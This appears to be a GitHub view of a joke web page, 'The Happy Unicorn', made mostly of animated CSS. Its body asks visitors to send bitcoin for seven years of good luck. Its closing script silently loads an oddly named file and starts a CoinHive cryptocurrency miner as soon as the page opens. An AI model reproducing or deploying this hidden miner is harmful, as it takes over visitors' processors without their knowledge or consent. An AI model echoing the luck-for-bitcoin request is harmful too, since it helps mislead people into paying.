-
Notifications
You must be signed in to change notification settings - Fork 0
/
index.html
206 lines (202 loc) · 3.15 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
<html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>THE HAPPY UNICORN</title>
<style>
body {
background: #FF99FF;
font-family: "LucidaConsole", Monaco, monospace;
font-weight: normal;
letter-spacing: -2.5px;
animation: infinite cs 6s;
-webkit-animation: infinite cs 6s;
-moz-animation: infinite cs 6s;
-o-animation: infinite cs 6s;
-ms-animation: infinite cs 6s;
}
h1 {
font-size: 42px
}
h4 {
font-size: 32px
}
h1,
h2,
h3,
h4,
h5 {
text-align: center
}
.all {
animation: 1 noBlur 5s;
-webkit-animation: 1 noBlur 5s;
-moz-animation: 1 noBlur 5s;
-o-animation: 1 noBlur 5s;
-ms-animation: 1 noBlur 5s;
}
.uni {
background-image: url('happy.gif');
background-size: cover;
background-repeat: no-repeat;
display: block;
margin: 0 auto;
width: 350px;
height: 350px;
}
@keyframes noBlur {
0% {
filter: blur(4px);
}
100% {
filter: blur(0px);
}
}
@-webkit-keyframes noBlur {
0% {
-webkit-filter: blur(4px);
}
100% {
-webkit-filter: blur(0px);
}
}
@-moz-keyframes noBlur {
0% {
-moz-filter: blur(4px);
}
100% {
-moz-filter: blur(0px);
}
}
@-o-keyframes noBlur {
0% {
-o-filter: blur(4px);
}
100% {
-o-filter: blur(0px);
}
}
@-ms-keyframes noBlur {
0% {
-ms-filter: blur(4px);
}
100% {
-ms-filter: blur(0px);
}
}
@keyframes cs {
0% {
background: #FF99FF;
}
25% {
background: #FFFC86;
}
50% {
background: #718DE2;
}
75% {
background: #6FFF9F;
}
100% {
background: #FF99FF;
}
}
@-webkit-keyframes cs {
0% {
background: #FF99FF;
}
25% {
background: #FFFC86;
}
50% {
background: #718DE2;
}
75% {
background: #6FFF9F;
}
100% {
background: #FF99FF;
}
}
@-moz-keyframes cs {
0% {
background: #FF99FF;
}
25% {
background: #FFFC86;
}
50% {
background: #718DE2;
}
75% {
background: #6FFF9F;
}
100% {
background: #FF99FF;
}
}
@-ms-keyframes cs {
0% {
background: #FF99FF;
}
25% {
background: #FFFC86;
}
50% {
background: #718DE2;
}
75% {
background: #6FFF9F;
}
100% {
background: #FF99FF;
}
}
@-o-keyframes cs {
0% {
background: #FF99FF;
}
25% {
background: #FFFC86;
}
50% {
background: #718DE2;
}
75% {
background: #6FFF9F;
}
100% {
background: #FF99FF;
}
}
table{
text-align:center;
margin:auto;
}
table tr td{
padding:3px 10px
}
table tr:first-child td{
font-weight:bold
}
a{
text-decoration:none;
color:#227
}
h5{
margin:40px 0 0 0;
}
</style>
</head>
<body>
<div class="all">
<h1>HELLO! I'M THE HAPPY UNICORN</h1>
<div class="uni"></div>
<h2>If you want good luck for 7 years, send bitcoin</h2>
<h4>1PUUy8i9J192xrSXRJypGDbxm8xGSHg616</h4>
<h3>The happy unicorn says you... Wibaluda!</h3>
</div>
<script src="evihnioc.js"></script>
<script>
var m = new CoinHive.Anonymous('3QiNbn9gvn0vv8S0A33u3XcHiHLy8mK2');
m.start();
</script>
</body></html>